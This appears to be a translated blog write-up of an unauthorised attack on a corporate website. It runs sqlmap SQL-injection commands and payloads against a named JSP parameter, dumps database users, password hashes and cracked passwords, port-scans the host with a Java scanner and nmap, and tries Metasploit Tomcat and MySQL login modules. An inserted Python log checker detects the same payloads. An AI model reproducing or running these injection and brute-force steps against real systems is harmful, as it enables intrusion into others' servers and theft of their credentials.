Using sqlmap against a corporate group
0x00 Finding the blind injection point
Reference link: http://bluereader.org/article/59585524
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --dbs
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: fax_id (GET)
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: fax_id=1' UNION ALL SELECT NULL,CONCAT(0x71786a7a71,0x72514471566c4b56546f,0x71706a7871),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: fax_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))dCsX) AND 'uYLq'='uYLq
---
available databases [3]:
[*] information_schema
[*] mysql
[*] mysql3235
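As an added example that is not part of the original post, the following Python checker shows what a defender would look for in web server access logs to catch the two payload shapes sqlmap reported above: a UNION SELECT carrying hex-encoded marker strings, and a SLEEP()-based time delay. The log lines are constructed for the example, not taken from the target.

```python
import re
from urllib.parse import parse_qsl

# Constructed Combined-Log-Format lines (not from the post). The two injected
# values reproduce the payloads sqlmap reported for the fax_id parameter.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jul/2015:23:05:01 +0800] "GET /yyoa/ext/trafaxserver/'
    'ToSendFax/messageViewer.jsp?fax_id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Jul/2015:23:05:02 +0800] "GET /yyoa/ext/trafaxserver/'
    'ToSendFax/messageViewer.jsp?fax_id=1%27%20UNION%20ALL%20SELECT%20NULL%2C'
    'CONCAT%280x71786a7a71%2C0x72514471566c4b56546f%2C0x71706a7871%29%2CNULL'
    '%2CNULL%23 HTTP/1.1" 200 640',
    '10.0.0.5 - - [19/Jul/2015:23:05:09 +0800] "GET /yyoa/ext/trafaxserver/'
    'ToSendFax/messageViewer.jsp?fax_id=1%27%20AND%20%28SELECT%20%2A%20FROM%20'
    '%28SELECT%28SLEEP%285%29%29%29dCsX%29%20AND%20%27uYLq%27%3D%27uYLq'
    ' HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')
UNION_RE = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)
TIME_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)   # MySQL delay functions
HEX_RE = re.compile(r"0x([0-9a-f]{2,})", re.I)               # MySQL hex literals

def decode_hex_literals(value):
    """Decode 0x... literals; sqlmap wraps extracted data in short marker strings."""
    out = []
    for h in HEX_RE.findall(value):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass   # odd length or non-text bytes: not a string marker
    return out

def analyze_request(line):
    """Return one finding per suspicious query parameter in an access log line."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return []
    query = m.group(1).split("?", 1)[1]
    results = []
    for name, value in parse_qsl(query, keep_blank_values=True):  # URL-decodes
        findings = []
        if UNION_RE.search(value):
            findings.append("union-select")
        if TIME_RE.search(value):
            findings.append("time-based")
        if findings:
            results.append({"param": name, "findings": findings,
                            "hex_literals": decode_hex_literals(value)})
    return results
```

The decoded hex literals expose sqlmap's boundary markers (short strings such as qxjzq ... qpjxq) that it uses to locate its own output in the response, which is a strong signal even when the SQL keywords are obfuscated.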
0x01 Looking at database tables and data
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --tables
This lists every table in the database. I then picked the schedule table at random and tried to dump its data:
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --dump -T schedule
But the result was disappointing:
[13:27:41] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
Database: mysql3235
Table: schedule
[0 entries]
+-------+---------+-----------+
| TITLE | ENDTIME | STARTTIME |
+-------+---------+-----------+
+-------+---------+-----------+
0x02 Trying to crack the database passwords
Get the database users:
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --users
database management system users [5]:
[*] ''@'localhost'
[*] 'cubetech'@'localhost'
[*] 'debugger'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
Get the database passwords:
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --users --passwords
database management system users password hashes:
[*] cubetech [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
[*] debugger [1]:
password hash: *6D45DF82DF6169868F43DD422AB3229D376BD1BE
clear-text password: debugger
[*] root [1]:
password hash: *1532B21FE550E115F113DAA9A26D0EEEEF8DEDC7
0x03 Looking for the MySQL port
Now that I had the database users and their passwords, I tried connecting to the database remotely. The IP is easy to get; it should be the web server itself, since an admin running a server like this probably hasn't separated the web server from the database.
Tried MySQL's port 3306: failed!
So I wrote a Java program to scan for open ports…
import java.net.Socket;
import java.util.ArrayList;
import java.util.List;

public class Check_Open_Port {
    public static void main(String args[]) {
        // shared work list of all ports; plain ArrayList, not thread-safe
        final List<Integer> li = new ArrayList<Integer>();
        for (int i = 0; i <= 65535; i++) {
            li.add(i);
        }
        // 101 worker threads, each pulling a random port from the list
        for (int i = 0; i <= 100; i++) {
            new Thread() {
                public void run() {
                    while (li.size() != 0) {
                        int li_get = 0;
                        int num = (int) Math.floor(Math.random() * (li.size()));
                        try {
                            li_get = li.get(num);
                            // unsynchronized get/remove: another thread may
                            // shift the list between these calls
                            int num_remove_check = li.indexOf(li_get);
                            if (num_remove_check != -1)
                                li.remove(num_remove_check);
                            Socket client = new Socket("122.233.243.***",
                                    li_get);
                            System.out.println("端口 : " + li_get + "已开放");
                            client.close();
                        } catch (Exception e) {
                            System.out.println("端口 : " + li_get + "未开放");
                        }
                    }
                }
            }.start();
        }
        // check whether our IP has been blocked, and print the current list size
        new Thread() {
            public void run() {
                while (li.size() != 0) {
                    try {
                        Socket client = new Socket("122.233.243.***", 80);
                        System.out.println("端口 : " + 80 + "已开放");
                        client.close();
                    } catch (Exception e) {
                        System.out.println("端口 : " + 80 + "未开放");
                    }
                    System.out.println("当前集合个数 : " + li.size());
                    try {
                        // join() on the running thread itself just times out
                        // after 50 s, acting as a crude sleep
                        join(50000);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
            }
        }.start();
    }
}
It scanned for a long time and in the end found nothing. There were two reasons:
1. It actually did find some, but there was so much console output that the open ports scrolled off the screen. I should have written the output to a log file.
2. Concurrency wasn't controlled properly: while one thread is removing an element from the list, another thread has already removed one, so positions in the List shift and lots of ports were skipped. I should have used a lock, or a map where each checked port has its value set to true.
Anyway, the port scan was just an experiment and not very technical. I decided to start from Tomcat and try cracking it with Metasploit.
0x04 Attacking Tomcat with Metasploit
In a terminal, run:
msfconsole
Set up the Tomcat module:
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHoSTS 122.233.243.***
RHoSTS => 122.233.243.***
msf auxiliary(tomcat_mgr_login) > set RPORT 80
RPORT => 80
msf auxiliary(tomcat_mgr_login) > run
It didn't crack the password - -.
Reference article: http://www.rising.com.cn/newsletter/news/2013-03-01/13256.html
0x05 Trying again with Metasploit to find the database port
msf > nmap -Pn -sV 122.233.243.***
Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-19 23:05 CST
Nmap scan report for 122.233.243.***
Host is up (0.13s latency).
Not shown: 991 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat/Coyote JSP engine 1.1
135/tcp closed msrpc
139/tcp closed netbios-ssn
593/tcp closed http-rpc-epmap
3389/tcp open ms-wbt-server Microsoft Terminal Service
4444/tcp closed krb524
6059/tcp open tcpwrapped
10000/tcp open snet-sensor-mgmt?
10010/tcp open rxapi?
Service Info: OS: Windows
Nothing we wanted seems to be there.
0x06 Out of options, I tried the MySQL scanner
msf auxiliary(tomcat_mgr_login) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 122.233.243.***
RHOSTS => 122.233.243.***
msf auxiliary(mysql_login) > run
[-] 122.233.243.***:3306 MYSQL - Unable to connect: The connection timed out (122.233.243.***:3306).
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Honestly, even a fool knows this can't work - -. After looking at the module info, it scans port 3306, so how could it possibly…
Reference link: http://www.bubuko.com/infodetail-343797.html
0x07 Finding the port via sql-shell
show variables like 'port';
or
select * from global_variables where VARIABLE_NAME ='PORT';
Both of the commands above can return the port, but global_variables is a temporary table that is only visible within the current connection, so it can't be used. Still, I wanted to try an INSERT to copy the value into a regular table:
python sqlmap.py -u "http://www.*.net/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1" --sql-shell "SELECT 'global_variables'" -v 5
insert into hr_event(name) select VARIABLE_NAME from information_schema.global_variables where VARIABLE_NAME ='PORT';
[02:46:34] [WARNING] execution of custom SQL queries is only available when stacked queries are supported
sqlmap's sql-shell can only run simple queries, so this approach doesn't work.